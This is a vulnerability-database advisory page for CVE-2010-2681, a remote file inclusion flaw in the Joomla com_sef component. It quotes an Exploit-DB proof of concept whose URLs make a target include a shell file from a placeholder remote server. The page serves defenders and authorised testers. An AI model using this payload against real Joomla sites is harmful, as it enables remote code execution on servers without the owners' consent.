CVE-2010-2681
Description
PHP remote file inclusion vulnerability in the SEF404x (com_sef) component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig.absolute.path parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_sef - Remote File Inclusion
==========================================================
Joomla Component (com_sef) RFI
===========================================================
WWw.HaCkTeacH.oRg/cc
+===================================================================================+
[?]Joomla Component (com_sef) RFI
+===================================================================================+
[?] My home: [http://HaCkTeCh.Org/cc ]
[?] For Ask: [F5w@hotmail.com ]
[?] Script: [ joomla ]
[?] home Script [ http://www.joomla.com/app ]
[?] Language: [ PHP ]
[?] Founder: [ Li0n-PaL ]
[?] Gr44tz to: [ Pal-Li0n - Red-D3v1L - Shadow-D3v1L - All HaCkTeacH CreW ]
===[ Exploit ]===
http://localhost/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=[shell.txt?]
DeMo ~
http://www.example.com/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://[remote-server]/[file]%00
EnJoY o_O
---------------------------------------------------------
./exitReferences
CWEs
CWE-94
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.